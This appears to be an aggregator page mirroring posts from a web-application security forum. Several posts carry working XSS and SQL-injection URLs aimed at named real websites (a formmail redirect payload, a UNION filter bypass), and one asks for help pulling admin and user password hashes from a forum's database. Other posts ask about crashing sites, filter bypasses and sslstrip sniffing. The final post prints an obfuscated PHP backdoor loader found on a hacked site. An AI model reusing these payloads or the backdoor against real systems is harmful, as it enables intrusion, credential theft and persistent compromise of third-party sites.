schuirink.net
news categories
Some of the newsfeeds can be viewed by category; choose one of the subjects below.Tech- & Geek news
News 4 (techs &) geeksTechnology news
Linux
Linux newsLinux Central headlines
Linux software announcements
Linux tips'n'tricks
Other OS'es
BEOS softwareBSD news
Mozilla
Mozilla relatedIT
SECURITYTelephony/VOIP
Networks
Internet Technology News
Webdev
WebdevelopmentWebdev::css
Webdev::javascript
WHO news
WHO newsfeedsDutch news
Dutch newsDutch weblogs
Dutch weblogsMore dutch weblogs
Podcasts
Dutch podcastsradiocast.nl
sla.ckers.org | The Web Application Security Forums
url: http://sla.ckers.orgformamil.pl javascript alert tag plus html alert tag within javascript tag (1 reply)
hello guys i just found out by my own how to include html within javascript... a working link with vulnerable formmail is here:
http://apo rre alo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert%28123%29;alert%28document.write.value=%3Ch1%3EHello%20%3C/h1%3E%29;
notice URL encoding...
the original formmail javascript injection was
http://apo rr ealo s.com/cgi-sys/formmail.pl?recipient=martin@aporrealos.com&subject=1&redirect=javascript:alert(123);alert(document.write.value=<h1>Hello</h1>);
I used this in Firefox version 7,,,,, When i copied it here the message board system automatically encoded the tags and parenthesis.
after i injected the code i got a 302 error that looked like this:
Found
The document has moved here.
Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.6 Phusion_Passenger/3.0.9 mod_bwlimited/1.4 Server at aporrealos.com Port 80
123 alert box popped up and later a Hello alert boxed popped up
Hello, (no replies)
Hi,
I am new in this forum.
Here for the sharing knowledge on different different topic.
Thanks & Regards,
Cole
http://www.esparkinfo.com/
TinKode Arrested in Romania (5 replies)
TinKode Arrested in Romania for hacking into NASA and the Pentagon
http://www.pcmag.com/article2/0,2817,2399698,00.asp
[Oracle] It's Injectable? (2 replies)
Hello everyone, this is my first so I introduce myself.
My name is Stephen and I'm Italian, I like computer science and programming especially in PHP, Perl, AJAX, JScript, Jquery.
I like doing "hacking" for passion and curiosity.
Now for the problem:
www.target.com/xxx?lol=asd&id_page=3536 '
The error that print is:
ORA-06512 PL / SQL: Error: Error converting from character to number of number or value ORA-06512: at line 2
I have never seen this type of error, I know that the DBMS is Oracle, but I do not know how to move forward.
If you can help me I would be very grateful.
If you have any paper or video tutorial about this it's not be bad.
Thanks in advance.
XSS - URL In Source Of Page (3 replies)
Hi,
Need assistance in validating a vulnerability. When executing a specific URL:
https://x.x.x.x/b/l.e?null=http://hXvpfwkV.example.com/
The page is returned and I can find "http://hXvpfwkV.example.com/" in the source of the page...here is the source:
<INPUT id="rt" name="rt" type="hidden" value="null=http://hXvpfwkV.example.com/">
I am trying to understand how this could be a vulnerability and how would one exploit it? What are the limitations?
Any assistance would be appreciated.
Regards
A
Can't bypass union (1 reply)
http://www.vlada.hr/design/vlada2/dtv/index.php?q=zagreb'+and+1=1+/*!uNioN*/+select+all+1,2,3,4,5,6,7+--+
can't bypass it -.-'
any ideas?
HEx Edit+GIMP to find Debug Mode in UPLOAD AVATAR php (1 reply)
HELLO GUYS I WAS EXPERIMENTING AND TAMPERING AROUND WITH A PICTURE AND DOING IMAGE INJECTION.I TOOK OF A HALO PICTURE I SHOT THEN I USED HXD HEX EDITOR AND EMBEDDED PHPINFO CODE INSIDE PIC, AFTER JPEG HEADER, I SAVED IT AS ,PHP,JPEG. THEN I USED GIMP AND CONVERTED THE PICTURE TO BLACK AND WHITE, i saved the file as .php.jpeg,in gimp FUNNY THING IS GIMP OPENS THE FILE AFTER I INSERTED THE PHP CODE in black and white mode, what did i do after this??
well i decided to go to a forum: foro, re vo lu cion al dia.org, checked myself in and uploaded the picture, the site had no problems uploading the picture to my surpise i got an error:
HERE ARE THE PICS, HALO, INJECTED IMAGE WITH HXD EDITOR AND THE ERROR ON FORUM:
RESULTS AFTER UPLOADING PICTURE IN THE FORUM, THIS IS AFTER UPLOADP:
Search,php; memberlist.php; login.php DOS and Gateway Time Out Errors (no replies)
Hi guys i was reading about the Gateway time out errors and how they are produced, is it possible to make a request to these php functions and overload a specific website so it would crash and/or freeze?
I was thinking about the following:
1.-making a very big request in those webpages, the logical consecuence will be that the server could not fulfill the request and come to a halt
2.- Use ping command to the especific URL and crash website
3.- Use a script to do it.
Is this possile???
I can't get my website to work (1 reply)
There was a website that somebody created and they gave me the source code package so that I could create my own version of the website based on their package.
These were the instructions that I had to follow (and I followed them all except one, which is why my website won't work and I am confused at the instruction):
--------------------------------------------------------------
== Server Requirements ==
- Apache (with mod_rewrite and peferably mod_expires)
- PHP 5
- MySQL
- SimpleXML
- cURL
== SQL ==
1. Using phpMyAdmin, create a new database and import the "tables.common.sql" file.
2. Open the "tables.site.sql" file using Notepad or another similiar text editor, replace "PREFIX_" with a unique prefix specific to that site and import that file into the database.
3. Now decide whether or not to make your site "Here's an idea" or taskforce styled.
- Here's an idea
- Uses the comment labeling system
- Taskforce
- Uses submission voting
4. Once you're decided, open the approriate SQL file and replace "PREFIX_" with the unique prefix that you come up with and import that file into the database.
Don't close that phpMyAdmin window yet, you need it at the end.
== Text editing ==
5. Rename "conf.dist.php" to "conf.php"
6. Open "conf.php" in your text editor. (Note that some settings are overrided by the site-specific file)
- Database settings
- Change those to match your database settings
- General configuration
- Change the URL and site name
- IMPORTANT: If you decide to make the site Here's an idea-styled, change 'shortname' to 'hai'. If you're doing taskforce-styled, change 'shortname' to 'taskforce'
- 'subsite' does nothing much except gives you a new class name for you to use in stylesheets
- Change 'reply_to' to your own e-mail address so that when users click on Reply in their e-mail client, it will reply directly to you
- Change 'send_mail' to true if you want subscriptions (note that this feature uses a SMTP server and is currently hard-coded, open system.php and do a search for "Swift_SmtpTransport")
- Get a RPX key at https://rpxnow.com/ and fill in the API key
7. Open .htaccess in your text editor and around line 20 and 24, change it to an approriate folder.
Don't give up, the remaining is going to be easy(ish).
== Misc ==
8. Upload all the files to your website
9. Open the website in your browser. If it loads, then congrats! If you don't, then make sure conf.php is edited properly and so on
10. Open the login dialog
11. Login to your account and register
12. After registering, go to the "common_users" table in phpMyAdmin
13. Edit the (only) row/user and change 'group' to 1
14. Save it and you have become the admin of your site
That's it!
-------------------------------------------------------------------------
Where it says "7. Open .htaccess in your text editor and around line 20 and 24, change it to an approriate folder." I am confused at exactly what I put in those lines in the .htaccess file. Because of this, I keep getting an HTTP 505 Internal Server error instead of my website working.
This is the contents of the .htaccess file:
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType text/css "access plus 7 days"
ExpiresByType text/javascript "access plus 7 days"
ExpiresByType text/x-javascript "access plus 7 days"
ExpiresByType application/javascript "access plus 7 days"
ExpiresByType application/x-javascript "access plus 7 days"
ExpiresByType image/gif "access plus 7 days"
ExpiresByType image/jpg "access plus 7 days"
ExpiresByType image/png "access plus 7 days"
</IfModule>
<IfModule mod_deflate.c>
AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css
</IfModule>
<IfModule mod_rewrite.c>
Options -MultiViews
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
# RewriteCond %{REQUEST_URI} !\..+$
RewriteRule . /index.php [L]
</IfModule>
ServerSignature Off
What exactly do I need to type in line 20 and 24 to change it to an appropriate folder? If needs be, I will provide a link to the zip file containing the source code package for the website.
XSS Challenge by Abraham Aranguren (no replies)
Fellow Slackers,
Abraham just asked me kindly to post this link here - so I did it :)
[blog.7-a.org]
Have fun,
.mario
P.S. Python2.7-dev is needed to compile this lib properly.. just FYI
Help With SQL injection i found debug mode (1 reply)
Hello guys sorry if ive been replying in other posts, i didnt see the create new topic until today, its usually below in forums...
Well i found the following vulnerabilities in this site:
www. aporr ealos.com/forum
links:
1-- http://aporrealos.com/forum/memberlist.php?mode[]=
Errors shown:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /home/aporrea/public_html/forum/memberlist.php on line 40
Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 479
Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 485
Warning: Cannot modify header information - headers already sent by (output started at /home/aporrea/public_html/forum/memberlist.php:40) in /home/aporrea/public_html/forum/includes/page_header.php on line 486
2.- http://aporrealos.com/forum/memberlist.php?start=-1
error:
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 60' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 60
Line : 151
File : memberlist.php
3.- http://aporrealos.com/forum/viewtopic.php?t=50837&postdays=0&postorder=desc%20limit&start=-16
error shown:
Could not query users
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 60' at line 4
SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 60
Line : 151
File : memberlist.php
Can you guys help me getting the password hashes from Admin4,Admin5 and rest of users please?
I need help with bypassing a nasty filter. (4 replies)
So here is what i'm dealing with;
<input type="hidden" name="object1" id="object1" value="XSSTEST">
So, of course I need to close the input, by adding ">.
<input type="hidden" name="object1" id="object1" value=""><script>prompt(1)</script>"
But my issue is, the filter filters out the (")'s and <>'s.
The output is;
<input type="hidden" name="object1" id="object1" value="&quot;&gt;TESTXSS">
I've tried HTML
Can anyone give me some insight?
Edit: I've already tried encoding it with the following; URL,Hex,Unicode,Named,Decimal,Hex,and XML escaped.
upload php files (1 reply)
...... ,,,
sslstrip why it works for me and not for gmail and rest? (3 replies)
I need help understand the dynamics of sslstrip attack against ssl certs. I'm using it test the security of a site which is in my ownership. I can successfully sniff the vicitim credentials over the internet but when the same attack happens over the in case of gmail or live msn i get no stuff back its completely static in that case.
Does it means their ssl is secure and mine is not? Like the rogue ssl cert generated by sslstrip is caught and blocked by their ssl cert security and mine is like configured in a insecure mode?
WHAT i need to do to prevent my site from such attacks.Thanks
alo.rs (no replies)
hi guys. i could use a bit of help with this.
does anyone have any ideas on how to bypass this php custom filter?
http://www.alo.rs/resources/templates/tools/print.php?id=45356
Help decoding a PHP file (3 replies)
Hi There,
Recently, my site was hacked. After running webdefender it suggests this file is a possible culprit. I'd like to decode it but havent the faintest idea how. Do any of you out there think you can help me with this?
Thank you!
Phoebe
<?php
preg_replace("/.*/e","\x65\x76\x61\x6c\x20\x28\x20\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x20\x28\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28'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